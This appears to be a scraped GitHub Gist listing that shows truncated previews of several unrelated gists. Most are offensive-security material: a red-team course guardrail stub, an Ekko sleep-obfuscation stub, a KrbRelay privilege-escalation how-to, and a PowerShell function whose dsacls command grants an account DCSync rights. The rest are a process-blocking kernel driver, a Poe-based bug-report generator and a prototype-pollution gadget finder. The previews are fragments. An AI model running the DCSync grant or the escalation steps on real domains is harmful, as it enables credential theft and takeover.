This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdint.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdbool.h> | |
#include <windows.h> | |
#include "nt_crap.h" | |
#define ArrayCount(arr) (sizeof(arr)/sizeof(arr[0])) | |
#define assert(expr) if(!(expr)) { *(char*)0 = 0; } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# White Knight Labs - Offensive Development Course | |
# Guardrails - Folder Check | |
#include <windows.h> // Include Windows-specific headers for system calls | |
#include <iostream> // Include for input and output stream operations | |
#include <string> // Include for using string class | |
#include <algorithm> // Include for standard algorithms, e.g., std::transform | |
#include <cctype> // Include for character handling functions, e.g., std::tolower | |
// Function to check if the path of the current executable is under a specified path |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import poe, sys | |
client = poe.Client("<POE_API_KEY_HERE>") | |
title=sys.argv[1] | |
path=sys.argv[2] | |
more="" | |
if len(sys.argv) > 3: | |
more="\" and here is more information: "+sys.argv[3] | |
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Core.h> | |
#include <Win32.h> | |
#include <Structs.h> | |
#include <Sleep.h> | |
#include <Utils.h> | |
SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance) | |
{ |
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-SyncMeUp{ | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Mandatory=$True)] | |
[string]$AccountName | |
) | |
$dse = [ADSI]"LDAP://Rootdse" | |
$namingcontext = $dse.defaultNamingContext | |
echo "Giving $AccountName DCSync rights" | |
dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <ntddk.h> | |
#define BLOCK_PROCESS "notepad.exe" | |
static OB_CALLBACK_REGISTRATION obcallback_registration; | |
static OB_OPERATION_REGISTRATION oboperation_callback; | |
#define PROCESS_CREATE_THREAD (0x0002) | |
#define PROCESS_CREATE_PROCESS (0x0080) | |
#define PROCESS_TERMINATE (0x0001) | |
#define PROCESS_VM_WRITE (0x0020) | |
#define PROCESS_VM_READ (0x0010) | |
#define PROCESS_VM_OPERATION (0x0008) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(() => { | |
let gadgets = []; | |
if (typeof _satellite !== 'undefined') { | |
gadgets.push('Adobe Dynamic Tag Management'); | |
} | |
if (typeof BOOMR !== 'undefined') { | |
gadgets.push('Akamai Boomerang'); | |
} |
NewerOlder